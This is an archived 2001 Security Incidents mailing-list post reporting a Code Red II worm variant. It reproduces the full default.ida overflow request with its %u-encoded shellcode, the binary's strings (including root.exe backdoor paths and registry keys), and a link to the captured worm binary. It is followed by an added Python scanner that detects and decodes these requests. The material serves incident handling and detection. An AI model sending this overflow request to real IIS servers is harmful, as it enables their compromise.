Security Incidents mailing list archives

new variant?


From: Stephen Friedl <friedl () mtndew com>
Date: Sat, 4 Aug 2001 08:34:49 -0700

Hello all,

I'm sorry if this is old news, but is there a new variant going around?
My logs just started showing entries with the signature

        /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX...

instead of the 

        /default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN...

that we've been used to. I know there is a CRv2, but I cannot find any
references to a different signature. I've captured the entire request,
and though the % code is all the same, the payload is different. This
is the "strings" output on the binary:

----------------------------------------------------------------------
GET 
/default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a
  HTTP/1.0
Content-type: text/xml
Content-length: 3379 
CodeRedII
F4)E
Th~f
Th~f
;MZu
KERNu
EL32u
GetPu
rocAu
D$$dg
LoadLibraryA
CreateThread
GetTickCount
Sleep
GetSystemDefaultLangID
GetSystemDirectoryA
CopyFileA
GlobalFindAtomA
GlobalAddAtomA
CloseHandle
_lcreat
_lwrite
_lclose
GetSystemTime
WS2_32.DLL
socket
closesocket
ioctlsocket
connect
select
send
recv
gethostname
gethostbyname
WSAGetLastError
USER32.DLL
ExitWindowsEx
\CMD.EXE
d:\inetpub\scripts\root.exe
d:\progra~1\common~1\system\MSADC\root.exe
hT @
hH @
hX @
t6Ff
%`0@
%d0@
%h0@
%p0@
%t0@
%x0@
%|0@
\EXPLORER.EXE
SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon
SFCDisable
SYSTEM\CurrentControlSet\Services\W3SVC\Parameters\Virtual Roots
/Scripts
/MSADC
c:\,,217
d:\,,217
KERNEL32.dll
ADVAPI32.dll
Sleep
GetWindowsDirectoryA
WinExec
RegQueryValueExA
RegSetValueExA
RegOpenKeyExA
RegCloseKey
d:\explorer.exe
8>u'j 
----------------------------------------------------------------------

The 3818-byte capture file is on my web server if anybody wants to poke around:

        http://www.unixwiz.net/misc/codered.bin

Thanks to dwmorris at DSLReports.com for the heads up on this.

Steve

--- 
Stephen J Friedl | Software Consultant | Tustin, CA |   +1 714 544-6561
www.unixwiz.net  | I speak for me only |   KA8CMY   | steve () unixwiz net
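The two signatures described in the message above, as an added example that is not part of the original post or of Steve's capture: a small Python scanner that picks /default.ida requests out of web-server log lines, separates the N-filled request from the X-filled one (whose binary carries the string CodeRedII) by the filler character, and decodes the %uHHHH tail into the bytes it occupies in memory. The log lines, client addresses and function names are constructed for this example.

```python
import re

# Constructed sample log lines (NCSA combined format), not taken from the post.
# The request strings mirror the two default.ida signatures it describes;
# the %u tail is the one shown in the captured request.
OVERFLOW_TAIL = (
    "%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801"
    "%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a"
)
SAMPLE_LOGS = [
    '192.0.2.10 - - [04/Aug/2001:08:10:11 -0700] "GET /default.ida?'
    + "X" * 224 + OVERFLOW_TAIL + ' HTTP/1.0" 404 -',
    '192.0.2.11 - - [04/Aug/2001:08:10:12 -0700] "GET /default.ida?'
    + "N" * 224 + OVERFLOW_TAIL + ' HTTP/1.0" 404 -',
    '192.0.2.12 - - [04/Aug/2001:08:10:13 -0700] "GET /index.html HTTP/1.1" 200 1234',
]

# The quoted request line inside a combined-format log entry.
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<path>\S+) HTTP/[0-9.]+"')
# /default.ida? followed by a run of one repeated letter, then the %u tail.
# Group 2 is the filler letter; \2* makes the run consist of that letter only.
DEFAULT_IDA_RE = re.compile(
    r"^/default\.ida\?(?P<filler>([A-Za-z])\2*)(?P<tail>%u.*)?$", re.IGNORECASE
)
# A complete IIS-style %u escape: exactly four hex digits.
PERCENT_U_RE = re.compile(r"%u([0-9a-fA-F]{4})")


def split_default_ida(path):
    """Return (filler_letter, filler_length, tail) for a Code Red style
    default.ida request, or None if the path does not have that shape."""
    m = DEFAULT_IDA_RE.match(path)
    if not m:
        return None
    filler = m.group("filler")
    return filler[0].upper(), len(filler), m.group("tail") or ""


def classify_path(path):
    """Label a request path by the filler letter; None for ordinary requests."""
    parts = split_default_ida(path)
    if parts is None:
        # Any other hit on the vulnerable .ida handler is still worth seeing.
        return "unrecognised default.ida request" if path.lower().startswith("/default.ida") else None
    letter, _, _ = parts
    if letter == "N":
        return "CodeRed (N filler)"
    if letter == "X":
        return "CodeRedII (X filler)"
    return f"default.ida probe (filler {letter!r})"


def decode_percent_u(tail):
    """Decode %uHHHH escapes to bytes. The .ida handler turns each escape into
    a 16-bit code unit, stored little-endian on x86, so %u9090 -> 90 90 (two
    NOPs) and %u6858 -> 58 68. Incomplete escapes such as the trailing %u00=a
    are left out rather than guessed at."""
    out = bytearray()
    for m in PERCENT_U_RE.finditer(tail):
        out += int(m.group(1), 16).to_bytes(2, "little")
    return bytes(out)


def scan(lines):
    """Return (client, label) for every log line that looks like a Code Red hit."""
    hits = []
    for line in lines:
        m = REQUEST_RE.search(line)
        if not m:
            continue
        label = classify_path(m.group("path"))
        if label:
            hits.append((line.split(" ", 1)[0], label))
    return hits


if __name__ == "__main__":
    for client, label in scan(SAMPLE_LOGS):
        print(f"{client:16} {label}")
    print("decoded tail:", decode_percent_u(OVERFLOW_TAIL).hex(" "))
```

Because the %u tail is the same in both requests, as the post notes, the filler letter is the only thing that separates the two in a log; the decoder is there to confirm that a new sighting really carries the same overflow bytes and not a different payload.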

----------------------------------------------------------------------------
This list is provided by the SecurityFocus ARIS analyzer service.
For more information on this free incident handling, management 
and tracking system please see: http://aris.securityfocus.com
